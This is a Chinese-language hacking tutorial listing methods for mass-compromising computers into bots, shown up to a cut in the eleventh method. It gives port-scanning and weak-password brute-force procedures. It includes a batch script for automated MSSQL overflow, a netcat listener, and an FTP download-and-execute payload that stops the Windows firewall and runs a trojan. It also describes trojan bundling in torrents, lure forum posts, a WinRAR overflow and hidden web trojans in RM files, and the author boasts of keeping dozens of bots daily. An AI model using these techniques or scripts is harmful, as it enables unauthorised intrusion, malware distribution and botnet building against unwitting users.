最快最有效的12种抓鸡方法思路心
得,首先得准备，免杀的STAT 或 一
只免杀鸽子或者其他的远控，一个免
费空间，一些工具(下面会提到) 　　
(1)扫3389端口抓肉鸡(适合新手)(抓
不了国外肉鸡) 　　现在国内网络上
流传着一种克隆版的XP，安装后会
默认开启一个账号为new,密码为空
的账户，而且基本上都是开着3389
的，我们就可以利用这一点来抓肉
鸡。首先用端口扫描工具(如S扫)扫
一段IP的3389端口，扫完后就直接
用远程桌面连接开放3389的机器(也
可以把结果保存为文本文件，用批量
生成3389连接的工具来连接)，然后
输入账号new登入，如果别人的电
脑前没人的话你就可以去你的空间下
载你传好的木马安装拉~~这种方法
只针XP系统，如果遇到2000或者
2003系统就不要试了呵呵。缺点也
很明显，如果别人不是用new账号
登入XP的，你再登入上去就会把他
挤出去(XP只支持单用户登入，用户
登入需要用工具开)，或者电脑前有
人你就不可能去打开IE下载木马了。
　　(2)扫135端口抓肉鸡 　　首先
先用端口扫描器扫一段IP的135端
口，然后把结果保存，再用NTSCAN
过滤有弱口令的机器，最后用
recton开telnet传马。因为现在135
和445端口都被防火墙屏蔽了，只能
扫本地的135肉鸡，要抓外地的只能
用外地的135肉鸡来扫。(详细动画可
以去黑客网站搜索135) 　　(3)扫445
端口抓肉鸡 　　和扫135抓肉鸡差不
多，首先先用端口扫描器扫一段IP的
445端口，然后把结果保存，再用
NTSCAN过滤有弱口令的机器，最后
用啊D工具包开共享传马。因为现在
135和445端口都被防火墙屏蔽了，
只能扫本地的445肉鸡，要抓外地的
只能用外地的445肉鸡来扫。(详细动
画可以去黑客网站搜索445) 　　
(4)1433端口批量溢出抓肉鸡 　　这
个方法可以实现全自动抓鸡，不过现
在太多人搞，成功率已经不高了。
　　要用到的工具：S扫
sqlhello.exe nc.exe 批处理文件 　
　首先先写个批处理，打开记事本，
把以下代码复制修改后，储存为扫描
+溢出.bat文件 　　@echo off 　　
for /f “eol=; tokens=1,2 delims= “
%%i in (tt.txt) do s.exe tcp %%i %
%j 1433 1000 /save 　　@echo off
　　for /f “eol=; tokens=1 delims=
“ %%i in (Result.txt) do sqlhello
%%i 1433 xxx.xxx.xx.xx 556 　　
还要新建一个tt.txt，里面你要扫的
IP段，格式为XXX.XXX.XXX.XXX
XXX.XXX.XXX.XXX,中间是空格 　
　1433是要扫描的端口，1000是扫
描线程数 ，do sqlhello %%i 1433
xxx.xxx.xx.xx 556 这个里的XXX添
你的IP，556是后面NC监听的端口
　　然后再写个批处理 　　@echo
off 　　Nc -l -vv -p 556 　　然后再
新建一个nc.txt,里面填写溢出成功后
让肉鸡下载你木马的代码。 　　这
里给出一种代码 　　echo open
X.X.X.X(你FTP的IP)*daima.txt 　
　echo **daima.txt 　　echo
password*daima.txt 　　echo
bin*daima.txt(以2进制传输数据)
　　echo get xxx.exe(你的木马的
文件名,要放在根目录下)*daima.txt
　　echo bye*daima.txt 　　net
stop sharedaccess(关闭
WINDOWS自带防火墙) 　　ftp -
s:daima.txt 　　xxx.exe(也是填你
木马的文件名) 　　del daima.txt
　　注意上面的代码回车符别删掉，
要不然就没法下你的马了。 　　更
多的代码去http://
publish.it168.com/2005/0731/20050731019501.shtm
这里看 　　上面的步骤都搞好后，
就可以开始扫肉鸡了。 　　先打开
多个NC.bat,然后再打开扫描+溢
出.bat,然后你就可以去睡大觉了。自
动扫描，扫描完后自动溢出，溢出后
还自动下马执行，爽吧!所以这里讲
详细点，呵呵。还有42 21端口也可
以这样溢出，只要用这些端口的溢出
工具就好了，详细动画可以去黑客网
站搜索1433。 　　忘了说，上面的
工具和批处理什么的都要放在同一个
文件夹下。 　　先休息一下，打这
么多字累死了 　　继续 　　(5)扫
1433抓肉鸡之方法2 　　要用到的工
具：端口扫描器 X-scan SQL综合利
用工具 　　上面我们说过了，1433
溢出现在成功率已经不高了，所以我
们可以用另一种方法。 　　开了
1433端口的机器一般都装了SQL，所
以我们可以猜测SQL弱口令来抓1433
肉鸡。 　　首先先用端口扫描器扫
一段IP的1433端口，然后结果保存
为文本文件，接着用X-scan导入这
些开了1433的IP，然后在扫描参数-
全局设置-扫描模块这一栏里只勾上
SQL-SERVER就可以了，其他不要
勾。然后在插件设置-端口相关设置-
待检测端口这一栏，只填1433端
口。然后就可以开始扫描了。扫描完
成后会有个报告，列出了有弱口令的
机器，然后打开SQL综合利用工具，
输入你扫到的弱口令来连接，接着打
开SQL综合利用工具-利用目录，上
传你的木马，然后在用DOS命令执行
你的木马就OK了。 　(6)用
WINNTAutoAttack扫SA弱口令抓
肉鸡 　　其实这个原理和上面一
样，效率也没上面的高，只是想让大
家知道下，呵呵。 　　工具：
WINNTAutoAttack SQL综合利用工
具 　　打开WINNTAutoAttack，
找一段IP添上，然后只勾上设置下的
仅对PING检查成功的机器进行检测
和SQL列出密码为空的SA账号，接
着开始扫描，扫完后，用 SQL综合
利用工具连上传马执行就好了。 　
　(7)扫4899空口令抓肉鸡 　　工
具：端口扫描器 4899探测器
Radmin 　　首先先用端口扫描器扫
一段IP的4899端口，然后用4899探
测器导入开了4899端口的IP，接着
扫空令，最后用Radmin连接有空口
令的机器，带开文件管理，上传的你
木马运行就OK了。详细动画可以去
黑客网站搜索4899 　　(8)扫5900端
口抓VNC肉鸡 　　工具：VNC扫描
器 VNC连接器 　　首先用VNC扫描
器扫描一段IP，扫描格式为
*can.exe(扫描器文件名) -i
219.0.0.0-219.255.255.255(扫描IP
段) -p 5900 -vnc -vv 　　扫描完成
后会在扫描器所在的同一文件夹生成
一个文本文件，打开后有一列IP，IP
后面的有一些单词比如
patched,banned,vulnerable,只有
单词为vulnerable才能连接。接着
就用VNC连接器连接，下面就不用多
说了吧? 详细动画可以去黑客网站搜
索VNC 　　接下来说说挂马抓肉鸡
吧。方法有很多，比如BT挂马、免
费空间挂马、迅雷挂马等等，有些我
也还不会，呵呵。下面就介绍几种我
会的。 　　(9)BT挂马　顾名思义，就是把你的木马发布到BT网站
让人下载。当然如果只把单纯的木马
文件发布上去效果肯定不好，而且现
在一般的BT网站也不让发布EXE文
件。所以我们需要一些隐藏的手法。
我们可以先把木马用捆绑器和一些电
影、音乐、游戏捆绑在一起，再压缩
成RAR文件发布，谁在开始下载时
会知道RAR里有木马呢?当他费了好
大劲下载完，打开发现是EXE的格式
后，总有些菜鸟会不想辜负自己花费
的时间而忍不住打开吧?尤其是下
XXX片的时候 当然你也可以做个网
页木马，然后把你网页木马的地址插
入到你发布的文件中(不是所有文件
都可以这样的，我只知道RM和EXE
文件可以插入)，别人下载打开后同
时也会带开你的网页木马，如果他的
系统没有补供你网页木马所利用的漏
洞的话，那他就会中你的马了。有些
朋友可能会想，我把木马和其他文件
捆绑后格式保持为那个文件(比如RM
捆绑木马后保持RM格式)，那样别人
不就不会怀疑了吗?呵呵，如果真有
这样的好事那我上面何不说把木马和
BT种子文件绑在一起发布，那样你
肉鸡不抓疯了才怪~~所以在这里说
一下，木马和其他文件捆绑后生成的
文件只能为EXE格式的，除非你有你
所捆绑文件的格式的溢出漏洞，那样
才能把生成后的文件格式保持为你所
捆绑文件的格式。不过这样的漏洞现
在很少，大多都被补了，就算有别人
也不一定会公开，为什么想想就知道
了吧。在这里就说一个最近的RAR
溢出漏洞，针对winrar3.6版本以下
的所有版本，只要你winrar版本低
于3.6，运行绑了牧马的RAR文件后
就会中马。此类木马症状为：运行
RAR文件后会弹出一个什么什么损
坏还是错误的对话框，然后RAR文
件体积变小，减少的体积就为木马的
体积。然后再次打开这个RAR文件
一切正常，不会弹出错误对话框。在
这里提醒下各位赶快更新下
WINRAR版本，小心中马哈。 　　
(10)免费空间挂马 　　其实和BT差
不多，就是把做好的木马上传到你申
请的免费空间，然后到论坛发些诱惑
性的帖子让别人下载你的木马。优点
是不用像BT那样做种子，那样不仅
要开着电脑，还影响网速。我这几天
就是这样挂的，弄个免费空间，上传
个木马，到2个XXX论坛发个帖子，
每天睡前一顶，才挂了几天，现在每
天肉鸡都保持在40-60只。而且大部
分都是美国的，很容易吧? 　　(11)
用RM在论坛挂马 　　首先你弄个只
有几秒钟的RM文件，然后插入你的
网页木马，接着上传到你的空间，然
后到一些支持插入RM连接的论坛发
帖子，点插入real media 播放器，
输入你的RM牧马地址，然后高度宽
度都设为1(这部是为了保证隐蔽
性 )，然后点发贴，这样别人在浏览
你的帖子就会运行你的R